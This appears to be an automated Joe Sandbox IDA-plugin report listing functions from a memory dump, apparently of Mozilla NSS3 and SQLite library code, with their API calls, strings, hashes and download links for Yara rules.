Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: sqlite3_mprintf$memcpysqlite3_freesqlite3_initializestrlen
String ID: sqlite3_get_table() called with two or more incompatible queries
API String ID: 750880481-4279182443
Opcode ID: 3dd0ef81237cec4721bd1ab819a04d5414775a250fbea1aee3498884e59d1a3d
Instruction ID: 2a4a308e085dbe35466eee6c5fd99aac676d87962dc429d6e72dfadbb742ae27
Opcode Fuzzy Hash: 3dd0ef81237cec4721bd1ab819a04d5414775a250fbea1aee3498884e59d1a3d
Instruction Fuzzy Hash: 9D41BE71600606EBDB10CF25D880A8AB7A5FF94769F14C638EC298BB40E731F995CBD5

Function 6C5C5ED0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 80stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(q]\l), ref: 6C5C5F0A
TlsGetValue.KERNEL32 ref: 6C5C5F1F
EnterCriticalSection.KERNEL32(89000904), ref: 6C5C5F2F
PR_Unlock.NSS3(890008E8), ref: 6C5C5F55
PR_SetError.NSS3(00000000,00000000), ref: 6C5C5F6D
SECMOD_UpdateSlotList.NSS3(8B4274C0), ref: 6C5C5F7D

Part of subcall function 6C5C5220: TlsGetValue.KERNEL32(00000000,890008E8,?,6C5C5F82,8B4274C0), ref: 6C5C5248
Part of subcall function 6C5C5220: EnterCriticalSection.KERNEL32(0F6C690D,?,6C5C5F82,8B4274C0), ref: 6C5C525C
Part of subcall function 6C5C5220: PR_SetError.NSS3(00000000,00000000), ref: 6C5C528E
Part of subcall function 6C5C5220: PR_Unlock.NSS3(0F6C68F1), ref: 6C5C5299
Part of subcall function 6C5C5220: free.MOZGLUE(00000000), ref: 6C5C52A9

Strings

q]\l, xrefs: 6C5C5EDB, 6C5C5F09

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue$ListSlotUpdatefreestrlen
String ID: q]\l
API String ID: 3150690610-3299449389
Opcode ID: fc31556495e3f5b8dc3ff24a2b7cde33757e8364be41ca40d6c6319865983993
Instruction ID: 6c10d598774682cf8ec5eb3d613d72d97fe7050b4c37ec559fc78b2b6eddf993
Opcode Fuzzy Hash: fc31556495e3f5b8dc3ff24a2b7cde33757e8364be41ca40d6c6319865983993
Instruction Fuzzy Hash: B321E7B1E00204AFDB049FA8DC41AEEB7F4EF49318F540029E90AA7701EB31A954CBD5

Function 6C588CF0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 76COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,?,6C59124D,00000001), ref: 6C588D19
EnterCriticalSection.KERNEL32(?,?,?,?,6C59124D,00000001), ref: 6C588D32
PL_ArenaRelease.NSS3(?,?,?,?,?,6C59124D,00000001), ref: 6C588D73
PR_Unlock.NSS3(?,?,?,?,?,6C59124D,00000001), ref: 6C588D8C

Part of subcall function 6C61DD70: TlsGetValue.KERNEL32 ref: 6C61DD8C
Part of subcall function 6C61DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C61DDB4

PR_Unlock.NSS3(?,?,?,?,?,6C59124D,00000001), ref: 6C588DBA

Strings

KRAM, xrefs: 6C588CF9
KRAM, xrefs: 6C588D3E

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
String ID: KRAM$KRAM
API String ID: 2419422920-169145855
Opcode ID: ce3181a281314ef5445b67a313093d3a32864a969c715b361bdd435a64c47c1b
Instruction ID: 9ceaf4b43ef259d8574a7635e8baa1e28017f2ab63caa684ec4430a71ae5e5f9
Opcode Fuzzy Hash: ce3181a281314ef5445b67a313093d3a32864a969c715b361bdd435a64c47c1b
Instruction Fuzzy Hash: 9121B2B5A06621CFCB00EF39C88455EB7F0FF45318F15896AD89987701DB30E841CB96

Function 6C680ED0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6C680EE6
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6C680EFA

Part of subcall function 6C56AEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6C56AF0E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C680F16
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C680F1C
DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C680F25
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C680F2B

Strings

Aborting, xrefs: 6C680EB3
Assertion failure: %s, at %s:%d, xrefs: 6C680ED9, 6C680EE5, 6C680F06, 6C680F0B

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: __acrt_iob_func$BreakDebugPrint__stdio_common_vfprintfabortfflush
String ID: Aborting$Assertion failure: %s, at %s:%d
API String ID: 2948422844-1374795319
Opcode ID: 1eac4aecbd6d8fd26a77b86b5291bcb17f89f4bdaf9dd952893989f9ae510884
Instruction ID: f9ae8b740e96dff8c1bbae0b9c588787d1638f14d2719cf345414a979d94f727
Opcode Fuzzy Hash: 1eac4aecbd6d8fd26a77b86b5291bcb17f89f4bdaf9dd952893989f9ae510884
Instruction Fuzzy Hash: B901ADB6901214BBDF01AF65DC858AB3B7CEF46364F004464FD0A97B12D631EA5187AA

Function 6C661C40 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 45COMMON

Download Yara Rule

APIs

sqlite3_mprintf.NSS3(non-deterministic use of %s() in %s,?,a CHECK constraint,w=Vl,?,?,6C564E1D), ref: 6C661C8A
sqlite3_free.NSS3(00000000), ref: 6C661CB6

Strings

non-deterministic use of %s() in %s, xrefs: 6C661C85
a generated column, xrefs: 6C661C6C
an index, xrefs: 6C661C67
w=Vl, xrefs: 6C661C44
a CHECK constraint, xrefs: 6C661C76, 6C661C81

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: sqlite3_freesqlite3_mprintf
String ID: a CHECK constraint$a generated column$an index$non-deterministic use of %s() in %s$w=Vl
API String ID: 1840970956-122210767
Opcode ID: d1709df1bed67e33893e7bd1d27e0e3691918a41cb63e7aed288a766f1d5aae7
Instruction ID: 1bb916e954a5f32e9c00f91d2a4c4b91dbab4d00a7ee358af8381d899d3bba0d
Opcode Fuzzy Hash: d1709df1bed67e33893e7bd1d27e0e3691918a41cb63e7aed288a766f1d5aae7
Instruction Fuzzy Hash: 610124B1A001405BD700BE68D802DB673E5EFC634CB15086DE8858BB52EA22EC67C795

Function 6C644D80 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 36COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C644DC3
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CA4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C644DE0

Strings

misuse, xrefs: 6C644DD5
API call with %s database connection pointer, xrefs: 6C644DBD
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C644DCB
invalid, xrefs: 6C644DB8
%s at line %d of [%.10s], xrefs: 6C644DDA

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
API String ID: 632333372-2974027950
Opcode ID: a295e4f48de995e5f6ce37569c0528b90ea6e0cfb95263f74ec1b4b795719098
Instruction ID: 76f2f61624398b0f166ff63dec94afdc285408190da7871eecbec2e40785b070
Opcode Fuzzy Hash: a295e4f48de995e5f6ce37569c0528b90ea6e0cfb95263f74ec1b4b795719098
Instruction Fuzzy Hash: BDF05921E049246BD7004455CC23FE633D54F01318F06C9A0FD047BE93D24AAC5187CD

Function 6C644DF0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 35COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C644E30
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CAD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C644E4D

Strings

misuse, xrefs: 6C644E42
API call with %s database connection pointer, xrefs: 6C644E2A
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C644E38
invalid, xrefs: 6C644E25
%s at line %d of [%.10s], xrefs: 6C644E47

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
API String ID: 632333372-2974027950
Opcode ID: 39b3176717eb3b85d7ee9424060d26e66e21e2e2d35516f55e66c5a873d1f0c7
Instruction ID: 9466eeff48bb2fca8d09bd1aaebe43a3b0d44b0cd183d323e0c532090e4a5259
Opcode Fuzzy Hash: 39b3176717eb3b85d7ee9424060d26e66e21e2e2d35516f55e66c5a873d1f0c7
Instruction Fuzzy Hash: FEF0E221E489286BE71006659C12FE63B859B01329F09C4A1EA0877F93D6499C63469A

Function 6C579FB0 Relevance: 12.2, APIs: 8, Instructions: 198COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C57A086
EnterCriticalSection.KERNEL32(?), ref: 6C57A09B
PR_Unlock.NSS3(?), ref: 6C57A0B7
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C57A0E9
TlsGetValue.KERNEL32 ref: 6C57A11B
EnterCriticalSection.KERNEL32(?), ref: 6C57A12F
PR_Unlock.NSS3(?), ref: 6C57A148

Part of subcall function 6C591A40: PR_Now.NSS3(?,00000000,6C5728AD,00000000,?,6C58F09A,00000000,6C5728AD,6C5793B0,?,6C5793B0,6C5728AD,00000000,?,00000000), ref: 6C591A65

Part of subcall function 6C591940: CERT_DestroyCertificate.NSS3(00000000,00000000,?,6C594126,?), ref: 6C591966

PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C57A1A3

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Arena_CriticalEnterFreeSectionUnlockUtilValue$CertificateDestroy
String ID:
API String ID: 3953697463-0
Opcode ID: 5ed592c7a5bd24a78fdf24443d35eb83afc32949079d5539c9338401c4799375
Instruction ID: 10097b31d8eb4fc19510bcf16bc51bf95085464bad7af6fb53e7c93faedced61
Opcode Fuzzy Hash: 5ed592c7a5bd24a78fdf24443d35eb83afc32949079d5539c9338401c4799375
Instruction Fuzzy Hash: E651EEB5E01200DBEB209F7ACC889AB77B8AF86318F155529DC19D7701EF31D985C6B1

Function 6C5B0C90 Relevance: 12.2, APIs: 8, Instructions: 191memorythreadCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(00000000,00000000,6C5B1444,?,00000001,?,00000000,00000000,?,?,6C5B1444,?,?,00000000,?,?), ref: 6C5B0CB3

Part of subcall function 6C61C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C61C2BF

PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C5B1444,?,00000001,?,00000000,00000000,?,?,6C5B1444,?), ref: 6C5B0DC1
PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6C5B1444,?,00000001,?,00000000,00000000,?,?,6C5B1444,?), ref: 6C5B0DEC

Part of subcall function 6C5D0F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C572AF5,?,?,?,?,?,6C570A1B,00000000), ref: 6C5D0F1A
Part of subcall function 6C5D0F10: malloc.MOZGLUE(00000001), ref: 6C5D0F30
Part of subcall function 6C5D0F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C5D0F42

SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6C5B1444,?,00000001,?,00000000,00000000,?), ref: 6C5B0DFF
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6C5B1444,?,00000001,?,00000000), ref: 6C5B0E16
free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C5B1444,?,00000001,?,00000000,00000000,?), ref: 6C5B0E53
PR_GetCurrentThread.NSS3(?,?,?,?,6C5B1444,?,00000001,?,00000000,00000000,?,?,6C5B1444,?,?,00000000), ref: 6C5B0E65
PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C5B1444,?,00000001,?,00000000,00000000,?), ref: 6C5B0E79

Part of subcall function 6C5C1560: TlsGetValue.KERNEL32(00000000,?,6C590844,?), ref: 6C5C157A
Part of subcall function 6C5C1560: EnterCriticalSection.KERNEL32(?,?,?,6C590844,?), ref: 6C5C158F
Part of subcall function 6C5C1560: PR_Unlock.NSS3(?,?,?,?,6C590844,?), ref: 6C5C15B2

Part of subcall function 6C58B1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6C591397,00000000,?,6C58CF93,5B5F5EC0,00000000,?,6C591397,?), ref: 6C58B1CB
Part of subcall function 6C58B1A0: free.MOZGLUE(5B5F5EC0,?,6C58CF93,5B5F5EC0,00000000,?,6C591397,?), ref: 6C58B1D2

Part of subcall function 6C5889E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6C5888AE,-00000008), ref: 6C588A04
Part of subcall function 6C5889E0: EnterCriticalSection.KERNEL32(?), ref: 6C588A15
Part of subcall function 6C5889E0: memset.VCRUNTIME140(6C5888AE,00000000,00000132), ref: 6C588A27
Part of subcall function 6C5889E0: PR_Unlock.NSS3(?), ref: 6C588A35

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
String ID:
API String ID: 1601681851-0
Opcode ID: de95b3381b18d44c1541829d90a0ea44365cd7454bc3b25a5ba7ba22e6936ee6
Instruction ID: 4d528d3f502acaae16d42f0fc85007b61f3c39755dd1188f145a6d12d4e9ac59
Opcode Fuzzy Hash: de95b3381b18d44c1541829d90a0ea44365cd7454bc3b25a5ba7ba22e6936ee6
Instruction Fuzzy Hash: D351D9F5E012509FEB009F64DD91AAF3BA89F85218F150465EC09AB752FB31ED1486A2

Function 6C566E50 Relevance: 12.2, APIs: 8, Instructions: 189COMMON

Download Yara Rule

APIs

sqlite3_value_text.NSS3(?,?), ref: 6C566ED8
sqlite3_value_text.NSS3(?,?), ref: 6C566EE5
memcmp.VCRUNTIME140(00000000,?,?,?,?), ref: 6C566FA8
sqlite3_value_text.NSS3(00000000,?), ref: 6C566FDB
sqlite3_result_error_nomem.NSS3(?,?,?,?,?), ref: 6C566FF0
sqlite3_value_blob.NSS3(?,?), ref: 6C567010
sqlite3_value_blob.NSS3(?,?), ref: 6C56701D
sqlite3_value_text.NSS3(00000000,?,?,?), ref: 6C567052

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: sqlite3_value_text$sqlite3_value_blob$memcmpsqlite3_result_error_nomem
String ID:
API String ID: 1920323672-0
Opcode ID: e1bd4145c4d8eb5985f2ab6191514489adf39257f369171844e891090a9f4715
Instruction ID: 05b42dfa34f488f19598eda844b7d3747bdfc2d1e4902299e43a4c83cbd1698d
Opcode Fuzzy Hash: e1bd4145c4d8eb5985f2ab6191514489adf39257f369171844e891090a9f4715
Instruction Fuzzy Hash: 1B61E3B1E142068BDB00CF66CC007EEF7B2AF85318F184169D854ABF65EB329C05CBA1

Function 6C5D8F80 Relevance: 12.2, APIs: 8, Instructions: 158memoryCOMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?,?,FFFFE005,?,6C5D7313), ref: 6C5D8FBB

Part of subcall function 6C5D07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C578298,?,?,?,6C56FCE5,?), ref: 6C5D07BF
Part of subcall function 6C5D07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C5D07E6
Part of subcall function 6C5D07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C5D081B
Part of subcall function 6C5D07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C5D0825

SECOID_FindOID_Util.NSS3(?,?,?,FFFFE005,?,6C5D7313), ref: 6C5D9012
SECOID_FindOID_Util.NSS3(?,?,?,?,FFFFE005,?,6C5D7313), ref: 6C5D903C
SECITEM_CompareItem_Util.NSS3(?,?,?,?,?,?,FFFFE005,?,6C5D7313), ref: 6C5D909E
PORT_ArenaGrow_Util.NSS3(?,?,?,00000001,?,?,?,?,?,?,FFFFE005,?,6C5D7313), ref: 6C5D90DB
PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,FFFFE005,?,6C5D7313), ref: 6C5D90F1

Part of subcall function 6C5D10C0: TlsGetValue.KERNEL32(?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D10F3
Part of subcall function 6C5D10C0: EnterCriticalSection.KERNEL32(?,?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D110C
Part of subcall function 6C5D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D1141
Part of subcall function 6C5D10C0: PR_Unlock.NSS3(?,?,?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D1182
Part of subcall function 6C5D10C0: TlsGetValue.KERNEL32(?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D119C

PR_SetError.NSS3(FFFFE005,00000000,?,?,?,FFFFE005,?,6C5D7313), ref: 6C5D906B

Part of subcall function 6C61C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C61C2BF

PR_SetError.NSS3(FFFFE005,00000000,?,FFFFE005,?,6C5D7313), ref: 6C5D9128

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Util$Error$ArenaFindValue$HashLookupTable$Alloc_AllocateCompareConstCriticalEnterGrow_Item_SectionUnlock
String ID:
API String ID: 3590961175-0
Opcode ID: 2fc2936615f096d3f3ee8ad3ca23cfff263c484281e358dca533e153235934d8
Instruction ID: e8834ce1bb251720a351dd33e4592f50b511eb74577e5355e865a60504797bda
Opcode Fuzzy Hash: 2fc2936615f096d3f3ee8ad3ca23cfff263c484281e358dca533e153235934d8
Instruction Fuzzy Hash: B7518F75A003028BEB10DFAEDC54B26B3F9AF84358F164529D915D7B61EB31F804CB9A

Function 6C589C50 Relevance: 12.1, APIs: 8, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 6C588850: calloc.MOZGLUE(00000001,00000028,00000000,?,?,6C590715), ref: 6C588859
Part of subcall function 6C588850: PR_NewLock.NSS3 ref: 6C588874
Part of subcall function 6C588850: PL_InitArenaPool.NSS3(-00000008,NSS,00000800,00000008), ref: 6C58888D

PR_NewLock.NSS3 ref: 6C589CAD

Part of subcall function 6C6398D0: calloc.MOZGLUE(00000001,00000084,6C560936,00000001,?,6C56102C), ref: 6C6398E5

Part of subcall function 6C5607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C4F204A), ref: 6C5607AD
Part of subcall function 6C5607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C4F204A), ref: 6C5607CD
Part of subcall function 6C5607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C4F204A), ref: 6C5607D6
Part of subcall function 6C5607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C4F204A), ref: 6C5607E4
Part of subcall function 6C5607A0: TlsSetValue.KERNEL32(00000000,?,6C4F204A), ref: 6C560864
Part of subcall function 6C5607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C560880
Part of subcall function 6C5607A0: TlsSetValue.KERNEL32(00000000,?,?,6C4F204A), ref: 6C5608CB
Part of subcall function 6C5607A0: TlsGetValue.KERNEL32(?,?,6C4F204A), ref: 6C5608D7
Part of subcall function 6C5607A0: TlsGetValue.KERNEL32(?,?,6C4F204A), ref: 6C5608FB

TlsGetValue.KERNEL32 ref: 6C589CE8
EnterCriticalSection.KERNEL32(?,?,6C58ECEC,6C592FCD,00000000,?,6C592FCD,?), ref: 6C589D01
TlsGetValue.KERNEL32(?,?,?,6C58ECEC,6C592FCD,00000000,?,6C592FCD,?), ref: 6C589D38
EnterCriticalSection.KERNEL32(?,?,6C58ECEC,6C592FCD,00000000,?,6C592FCD,?), ref: 6C589D4D
PR_Unlock.NSS3 ref: 6C589D70
PR_Unlock.NSS3 ref: 6C589DC3
PR_NewLock.NSS3 ref: 6C589DDD

Part of subcall function 6C5888D0: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C590725,00000000,00000058), ref: 6C588906
